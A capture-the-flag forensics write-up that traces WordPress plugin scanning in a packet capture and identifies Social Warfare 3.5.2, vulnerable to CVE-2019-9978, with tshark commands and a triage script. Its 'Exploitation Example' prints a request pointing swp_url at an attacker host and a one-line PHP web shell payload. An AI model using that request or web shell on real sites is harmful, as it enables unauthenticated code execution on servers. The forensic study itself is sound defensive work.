KnightCTF 2026 - Forensics: Vulnerability Exploitation
Challenge Information
- Category: Forensics
- File: pcap2.pcapng
Challenge Description
Using the same pcap file (pcap2.pcapng), find the vulnerable plugin name and version.
Flag Format: KCTF{plugin_name_version}
Solution
Step 1: Identify Plugin Scanning Activity
The attacker (192.168.1.104) was scanning for WordPress plugins. Searching for plugin readme.txt requests:
```bash
strings pcap2.pcapng | grep -i 'readme.txt' | sort -u
```
Found targeted plugin scans:
```
HEAD /wordpress/wp-content/plugins/social-warfare/readme.txt HTTP/1.1
GET /wordpress/wp-content/plugins/social-warfare/readme.txt HTTP/1.1
HEAD /wordpress/wp-content/plugins/thim-blocks/readme.txt HTTP/1.1
GET /wordpress/wp-content/plugins/thim-blocks/readme.txt HTTP/1.1
```
Step 2: Extract Plugin Information
Exported HTTP objects from the pcap:
```bash
tshark -r pcap2.pcapng -Y 'http' --export-objects 'http,/tmp/http_export'
```
Step 3: Analyze readme.txt Content
Read the exported readme.txt file to find plugin details:
```bash
cat /tmp/http_export/readme.txt
```
Content revealed:
```
=== WordPress Social Sharing Plugin - Social Warfare ===
Contributors: holas84, dustinwstout, webinator, warfareplugins...
Tags: sharing buttons, social media share, floating share buttons...
Requires at least: 4.5.0
Tested up to: 5.1
Stable tag: 3.5.2
Requires PHP: 5.6
```
Step 4: Vulnerability Identification
Social Warfare version 3.5.2 is vulnerable to CVE-2019-9978 - an Unauthenticated Remote Code Execution (RCE) vulnerability.
This vulnerability allows attackers to inject malicious payloads via the swp_url parameter, leading to arbitrary code execution on the server.
Affected Versions: < 3.5.3
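Steps 1 to 4 can be scripted for triage. The following is an added example, not part of the original write-up: it lists the plugin slugs probed via readme.txt, flags requests whose swp_url parameter points at a remote URL, and checks the readme's Stable tag against the fixed version. The sample input, the example.invalid host and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample input, modelled on the request lines and readme in this write-up.
REQUESTS = """\
HEAD /wordpress/wp-content/plugins/social-warfare/readme.txt HTTP/1.1
GET /wordpress/wp-content/plugins/social-warfare/readme.txt HTTP/1.1
HEAD /wordpress/wp-content/plugins/thim-blocks/readme.txt HTTP/1.1
GET /wordpress/wp-content/plugins/thim-blocks/readme.txt HTTP/1.1
GET /wordpress/?swp_url=http://example.invalid/payload.txt HTTP/1.1
GET /wordpress/?p=1 HTTP/1.1
"""
README = """\
=== WordPress Social Sharing Plugin - Social Warfare ===
Tested up to: 5.1
Stable tag: 3.5.2
Requires PHP: 5.6
"""
FIXED_IN = (3, 5, 3)  # the write-up lists affected versions as < 3.5.3
PROBE = re.compile(r"/wp-content/plugins/([a-z0-9_-]+)/readme\.txt$", re.I)

def triage(request_lines):
    """Return (probed plugin slugs, request targets carrying a remote swp_url)."""
    probed, remote = set(), []
    for line in request_lines.splitlines():
        parts = line.split()
        if len(parts) != 3 or not parts[2].startswith("HTTP/"):
            continue  # strings(1) output also contains non-request noise
        url = urlsplit(parts[1])
        m = PROBE.search(url.path)
        if m:
            probed.add(m.group(1).lower())
        for value in parse_qs(url.query).get("swp_url", []):
            if urlsplit(value).scheme in ("http", "https"):
                remote.append(parts[1])
    return sorted(probed), remote

def stable_tag(readme):
    """Parse 'Stable tag: x.y.z' into a tuple of ints, or None if absent."""
    m = re.search(r"^Stable tag:\s*(\d+(?:\.\d+)*)\s*$", readme, re.M)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None

def is_affected(version):
    """True when the parsed version is below the fixed release."""
    return version is not None and version < FIXED_IN

if __name__ == "__main__":
    print(triage(REQUESTS), stable_tag(README), is_affected(stable_tag(README)))
```

To run it against the capture, feed `triage()` the output of the `strings ... | grep` pipeline and `stable_tag()` the exported readme.txt.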
Flag
```
KCTF{social_warfare_3.5.2}
```
Vulnerability Details
CVE-2019-9978 - Social Warfare RCE
| Attribute | Value |
|---|---|
| Plugin | Social Warfare |
| Vulnerable Version | 3.5.2 (and below) |
| CVE | CVE-2019-9978 |
| Type | Unauthenticated RCE |
| CVSS Score | 9.8 (Critical) |
How the Attack Works
- Attacker scans for Social Warfare plugin presence via readme.txt
- Plugin confirmed with version 3.5.2 (vulnerable)
- Exploit uses swp_url parameter to load malicious payload
- Payload executes arbitrary PHP code on the server
Exploitation Example
```
GET /wordpress/?swp_url=http://attacker.com/payload.txt
```
Where payload.txt contains:
```
<pre>system($_GET['cmd'])</pre>
```
Attack Timeline from PCAP
- Directory Bruteforce - Attacker scanned thousands of paths
- Plugin Enumeration - Checked for various vulnerable plugins
- timthumb Scanning - Searched for timthumb.php vulnerabilities
- Social Warfare Discovery - Found and identified vulnerable plugin
- User Enumeration - Used wp-json API to find admin user
- Login Attempt - Tried credentials against wp-login.php
Tools Used
- tshark (HTTP object export)
- strings
- grep
- Wireshark
Author: MR. Umair
Date: January 20, 2026
Competition: KnightCTF 2026